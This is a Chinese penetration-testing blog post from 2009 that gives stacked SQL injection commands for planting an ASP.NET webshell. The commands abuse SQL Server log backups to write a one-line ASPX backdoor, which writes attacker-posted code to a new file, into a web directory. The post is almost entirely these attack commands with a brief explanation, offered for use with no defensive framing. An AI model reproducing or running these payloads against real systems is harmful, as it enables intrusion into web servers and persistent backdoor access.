ASP.NET备份db日志获得webshell-oma-ChinaUnix博客

渗透

首页　| 　博文目录　| 　关于我

oma

博客访问： 2280609
博文数量： 181
博客积分： 9990
博客等级：中将
技术积分： 1865
用户组：普通用户
注册时间： 2006-05-23 09:43

文章分类

全部博文（181）

cms（2）

phpcms（2）
好友专区（1）
oracle专题（2）
windows（5）
渗透技巧总结（34）

linux（4）
渗透工具（25）
webshell（2）
asp专题（36）
aspx专题（2）
php专题（41）
免杀专题（1）
提权相关（2）
asp木马（1）
休闲心情（10）
其它（17）
未分配的博文（0）

文章存档

2011年（40）

2010年（17）

2009年（87）

2008年（37）

我的朋友

相关博文

ASP.NET备份db日志获得webshell

分类：网络与安全

2009-03-06 14:45:06

;alter database pubs set RECOVERY FULL
;create table pubs.dbo.cmd(a image)
;backup log pubs to disk = 'c:\TM' with init
;insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("i.aspx"),false);ow.Write(Request.Params["m"]);ow.Close()%> ')
;backup log pubs to disk = 'd:\haha.aspx'

这个和asp的一样，客户端post一个变量m把木马代码丢在变量m里面就行了。这个是类似asp的一句话木马的。
网上的asp.net的上传文件程序
;drop table pubs.dbo.cmd
;alter database pubs set RECOVERY FULL
;create table pubs.dbo.cmd(a image)
;backup log pubs to disk = 'c:\TM' with init
;insert into pubs.dbo.cmd(a) values ('')
;backup log pubs to disk = 'd:\haha2.aspx'

阅读(463) | 评论(0) | 转发(0) |

上一篇：内网渗透---常用手法

下一篇：xp_cmdshell在sql2000和sql2005恢复办法

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6